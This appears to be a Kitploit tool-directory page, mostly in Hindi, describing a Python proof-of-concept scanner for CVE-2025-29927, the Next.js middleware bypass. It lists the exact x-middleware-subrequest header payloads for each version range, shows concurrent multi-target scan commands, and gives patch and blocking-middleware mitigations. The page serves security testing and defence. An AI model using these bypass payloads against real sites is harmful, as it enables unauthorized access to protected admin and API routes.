Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
poc-nextjs-CVE-2025-29927 — Automated PoC scanner for CVE-2025-29927 Next.js middleware bypass vulnerability. Tests multiple x-middleware-subrequest payloads across target URLs with concurrent scanning and JSON export. | Kitploit
उपकरण/GitHubGitHub/ticofookfook/poc-nextjs-cve-2025-29927
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubticofookfook/poc-nextjs-cve-2025-29927

poc-nextjs-CVE-2025-29927

Automated PoC scanner for CVE-2025-29927 Next.js middleware bypass vulnerability. Tests multiple x-middleware-subrequest payloads across target URLs with concurrent scanning and JSON export.

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

Next.js मिडलवेयर सबरिक्वेस्ट भेद्यता स्कैनर

CVE-2025-29927 (Next.js मिडलवेयर भेद्यता) का पता लगाने के लिए एक मजबूत प्रूफ ऑफ कॉन्सेप्ट (PoC) उपकरण।

अवलोकन

यह उपकरण Next.js अनुप्रयोगों में एक महत्वपूर्ण भेद्यता का परीक्षण करता है, जहाँ x-middleware-subrequest हेडर का उपयोग मिडलवेयर में लागू सुरक्षा जाँचों को बायपास करने के लिए किया जा सकता है। शोषण में विशिष्ट दुर्भावनापूर्ण हेडर के साथ HTTP अनुरोध भेजना शामिल है, जो Next.js संस्करण के अनुसार भिन्न होता है।

शोषण कैसे काम करता है

शोध के अनुसार, विभिन्न Next.js संस्करणों के लिए अलग-अलग पेलोड मौजूद हैं:

  1. संस्करण 12.2 से पहले:

    root@kitploit:~
    x-middleware-subrequest: pages/_middleware
    
  2. संस्करण 12.2 से आगे:

    root@kitploit:~
    x-middleware-subrequest: middleware
    

    या

    root@kitploit:~
    x-middleware-subrequest: src/middleware
    

    (यदि अनुप्रयोग src निर्देशिका का उपयोग करता है)

  3. नवीनतम संस्करण (जैसे 15.x):

    root@kitploit:~
    x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

    या

    root@kitploit:~
    x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
    

हमारी PoC स्वचालित रूप से इन सभी पेलोड का परीक्षण करती है और रिपोर्ट करती है कि कौन सा सफल रहा।

विशेषताएँ

  • एक या एकाधिक लक्ष्यों का परीक्षण
  • मल्टीथ्रेडिंग के साथ समवर्ती स्कैनिंग
  • अनुकूलन योग्य अनुरोध पथ
  • सभी संभावित पेलोड का स्वचालित परीक्षण
  • टर्मिनल में विस्तृत और रंगीन आउटपुट
  • परिणामों का JSON में निर्यात
  • मजबूत त्रुटि प्रबंधन
  • व्यापक भेद्यता का पता लगाना

आवश्यकताएँ

  • Python 3.7+
  • आवश्यक पैकेज:
    • requests
    • colorama

स्थापना

root@kitploit:~
# रिपॉजिटरी को क्लोन करें या फ़ाइलें डाउनलोड करें
# निर्देशिका में जाएँ
cd poc-nextjs-2025

# आवश्यक पैकेज स्थापित करें
pip install -r requirements.txt

उपयोग

root@kitploit:~
python main.py -u https://example.com   # एकल URL का परीक्षण करें
python main.py -f targets.txt           # फ़ाइल से कई URL का परीक्षण करें

कमांड लाइन तर्क

उदाहरण

root@kitploit:~
# एकल लक्ष्य का बुनियादी स्कैन
python main.py -u https://example.com

# कस्टम पथ के साथ कई लक्ष्य स्कैन करें
python main.py -f targets.txt -p /api/users,/admin,/dashboard

# अधिक समवर्तीता और लंबी टाइमआउट के साथ स्कैन करें
python main.py -u https://example.com -t 10 --timeout 15

# परिणाम JSON फ़ाइल में सहेजें
python main.py -u https://example.com -o scan_results.json

पता लगाने की पद्धति

स्कैनर निम्नलिखित के माध्यम से काम करता है:

  1. लक्ष्य के लिए एक सामान्य अनुरोध भेजना
  2. Next.js संस्करणों के अनुसार x-middleware-subrequest हेडर के विभिन्न रूपों वाले अनुरोध भेजना
  3. भेद्यता के संकेतकों की पहचान करने के लिए प्रतिक्रियाओं की तुलना करना:
    • सामान्य अनुरोध अवरुद्ध (4xx/5xx) लेकिन शोषण अनुरोध अनुमत (2xx)
    • प्रतिक्रिया सामग्री में महत्वपूर्ण अंतर
    • प्रमाणीकरण/प्राधिकरण बायपास के संकेतक

शमन

यदि आप कमजोर अनुप्रयोग पाते हैं, तो इन शमनों को लागू करें:

  • Next.js को संस्करण 14.2.25 या 15.2.3 या बाद के संस्करण में अपडेट करें
  • एक मिडलवेयर लागू करें जो x-middleware-subrequest हेडर वाले अनुरोधों को ब्लॉक करता है
root@kitploit:~
export function middleware(request: NextRequest) {
  if (request.headers.has('x-middleware-subrequest')) {
    return new Response('Unauthorized', { status: 401 });
  }
  return NextResponse.next();
}
टूल डाउनलोड करें
विकल्पविवरण
-u, --url URLस्कैन करने के लिए लक्ष्य URL
-f, --file FILEएकाधिक URL (एक प्रति पंक्ति) वाली फ़ाइल
-p, --paths PATHSअल्पविराम से अलग किए गए परीक्षण पथ (डिफ़ॉल्ट: सामान्य पथ)
-t, --threads Nसमवर्ती थ्रेड की संख्या (डिफ़ॉल्ट: 5)
-o, --output FILEपरिणाम JSON फ़ाइल में सहेजें
--timeout Nअनुरोध समय सीमा सेकंड में (डिफ़ॉल्ट: 10)